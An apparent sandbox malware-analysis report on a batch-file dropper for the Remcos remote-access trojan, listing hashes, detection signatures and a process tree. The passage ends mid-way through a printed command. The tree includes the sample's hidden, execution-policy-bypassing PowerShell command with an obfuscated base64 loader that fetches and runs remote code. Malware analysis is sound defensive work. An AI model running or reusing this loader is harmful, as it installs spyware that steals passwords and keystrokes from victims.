Windows
Analysis Report
uowzo4rEa5.bat
Overview
General Information
Sample name: | uowzo4rEa5.batrenamed because original name is a hash value |
Original sample name: | e4f4afa1b85113656d4788a4f48fa5263b31b922d3e345093e082486193b0275.bat |
Analysis ID: | 1612233 |
MD5: | 9dc9c00b77a0f0a41faf77a48d619e29 |
SHA1: | f71cd56a14dc50b9f33d54dc6dfc0295d943c6b4 |
SHA256: | e4f4afa1b85113656d4788a4f48fa5263b31b922d3e345093e082486193b0275 |
Tags: | abokirem-duckdns-orgbatuser-JAMESWT_MHT |
Infos: | |
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 6844 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\uowzo 4rEa5.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 5964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 6572 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\uowzo4 rEa5.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 2724 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 1200 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -Command "[Text.En coding]::U TF8.GetStr ing([Conve rt]::FromB ase64Strin g('dHJ5e2l leCAoKGlle CAoKCd3Ynd oaGJyam5rc WVucGVpd2J 3aGhicmpua 3FlbnBld3d id2hoYnJqb mtxZW5wZXJ 3YndoaGJya m5rcWVucGU gd2J3aGhic mpua3FlbnB lLXdid2hoY nJqbmtxZW5 wZVV3Yndoa GJyam5rcWV ucGVzd2J3a Ghicmpua3F lbnBlZXdid 2hoYnJqbmt xZW5wZUJ3Y ndoaGJyam5 rcWVucGVhd 2J3aGhicmp ua3FlbnBlc 3did2hoYnJ qbmtxZW5wZ Wl3YndoaGJ yam5rcWVuc GVjd2J3aGh icmpua3Flb nBlUHdid2h oYnJqbmtxZ W5wZWF3Ynd oaGJyam5rc WVucGVyd2J 3aGhicmpua 3FlbnBlc3d id2hoYnJqb mtxZW5wZWl 3YndoaGJya m5rcWVucGV ud2J3aGhic mpua3FlbnB lZ3did2hoY nJqbmtxZW5 wZSAid2J3a Ghicmpua3F lbnBlaHdid 2hoYnJqbmt xZW5wZXR3Y ndoaGJyam5 rcWVucGV0d 2J3aGhicmp ua3FlbnBlc Hdid2hoYnJ qbmtxZW5wZ XN3YndoaGJ yam5rcWVuc GU6d2J3aGh icmpua3Flb nBlL3did2h oYnJqbmtxZ W5wZS93Ynd oaGJyam5rc WVucGUwd2J 3aGhicmpua 3FlbnBleHd id2hoYnJqb mtxZW5wZTB 3YndoaGJya m5rcWVucGU ud2J3aGhic mpua3FlbnB lc3did2hoY nJqbmtxZW5 wZXR3Yndoa GJyam5rcWV ucGUvd2J3a Ghicmpua3F lbnBlOHdid 2hoYnJqbmt xZW5wZUt3Y ndoaGJyam5 rcWVucGV1d 2J3aGhicmp ua3FlbnBlV ndid2hoYnJ qbmtxZW5wZ S53YndoaGJ yam5rcWVuc GVwd2J3aGh icmpua3Flb nBlc3did2h oYnJqbmtxZ W5wZTF3Ynd oaGJyam5rc WVucGUiJyk uUmVwbGFjZ Sgnd2J3aGh icmpua3Flb nBlJywnJyk pKS5Db250Z W50KSAtRXJ yb3JBY3Rpb 24gU2lsZW5 0bHlDb250a W51ZX1jYXR jaHt9O2Z1b mN0aW9uIHB 0amtzKCRwY XJhbV92YXI pewkkYWVzX 3Zhcj1bU3l zdGVtLlNlY 3VyaXR5LkN yeXB0b2dyY XBoeS5BZXN dOjpDcmVhd GUoKTsJJGF lc192YXIuT W9kZT1bU3l zdGVtLlNlY 3VyaXR5LkN yeXB0b2dyY XBoeS5DaXB oZXJNb2RlX To6Q0JDOwk kYWVzX3Zhc i5QYWRkaW5 nPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LlBhZGRpb mdNb2RlXTo 6UEtDUzc7C SRhZXNfdmF yLktleT1bU 3lzdGVtLkN vbnZlcnRdO jooJ2duaXJ 0UzQ2ZXNhQ m1vckYnWy0 xLi4tMTZdI C1qb2luICc nKSgnTGlYa UhYbmtLdEV DZ3NEaFdZZ Fc2Z3FZWm4 1cHhwakUzU XROLzNnQjI zYz0nKTsJJ GFlc192YXI uSVY9W1N5c 3RlbS5Db25 2ZXJ0XTo6K CdnbmlydFM 0NmVzYUJtb 3JGJ1stMS4 uLTE2XSAta m9pbiAnJyk oJ3Ird1FPU i9QYUdmZWN TVk8vOGlrd FE9PScpOwk kZGVjcnlwd G9yX3Zhcj0 kYWVzX3Zhc i5DcmVhdGV EZWNyeXB0b 3IoKTsJJHJ ldHVybl92Y XI9JGRlY3J 5cHRvcl92Y XIuVHJhbnN mb3JtRmluY WxCbG9jayg kcGFyYW1fd mFyLCAwLCA kcGFyYW1fd mFyLkxlbmd 0aCk7CSRkZ WNyeXB0b3J fdmFyLkRpc 3Bvc2UoKTs JJGFlc192Y XIuRGlzcG9 zZSgpOwkkc mV0dXJuX3Z hcjt9ZnVuY 3Rpb24gb2Z ldGEoJHBhc mFtX3Zhcil 7CUlFWCAnJ GpocnVuPU5 ldy1PYmplY 3QgU3lzdGV tLklPLk1BQ kNlbUFCQ29 yQUJDeVNBQ kN0ckFCQ2V hQUJDbSgsJ HBhcmFtX3Z hcik7Jy5SZ XBsYWNlKCd BQkMnLCAnJ yk7CUlFWCA nJGpidXJpP U5ldy1PYmp lY3QgU3lzd GVtLklPLkF CQ01BQkNlQ UJDbUFCQ29 BQkNyQUJDe UFCQ1NBQkN 0QUJDckFCQ 2VBQkNhQUJ DbUFCQzsnL lJlcGxhY2U oJ0FCQycsI CcnKTsJSUV YICckZ2l5b 2g9TmV3LU9 iamVjdCBTe XN0ZW0uSU8 uQ0FCQ29tQ UJDcHJBQkN